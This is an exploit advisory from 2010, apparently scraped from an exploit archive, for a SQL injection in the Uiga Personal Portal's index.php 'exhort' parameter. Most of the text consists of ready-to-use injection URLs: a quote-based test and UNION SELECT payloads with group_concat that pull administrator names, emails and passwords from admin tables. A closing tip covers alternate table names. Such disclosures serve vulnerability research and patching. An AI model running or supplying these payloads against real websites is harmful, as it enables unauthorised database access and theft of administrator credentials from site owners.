30 lines
No EOL
786 B
Text
30 lines
No EOL
786 B
Text
# Exploit Title: Uiga Personal Portal index.php (view) SQL Injection
|
|
Vulnerability
|
|
# Date: 27-4-2010
|
|
# Author: 41.w4r10r
|
|
# Software Link :
|
|
http://www.scriptdevelopers.net/download/uigapersonalportal.zip
|
|
# Version: Web Application
|
|
# Tested on: Apcahe/Unix
|
|
# CVE : [if exists]
|
|
# Dork :
|
|
# Code :
|
|
|
|
|
|
|
|
Exploited Link :
|
|
|
|
http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'
|
|
|
|
Examples :
|
|
|
|
http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr
|
|
|
|
oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--
|
|
|
|
http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema
|
|
|
|
il,0x3a,admin_password),8,9,10,11+from+tbl_admin--
|
|
|
|
Important: Sometimes the table name is administrators and sometimes its
|
|
admin |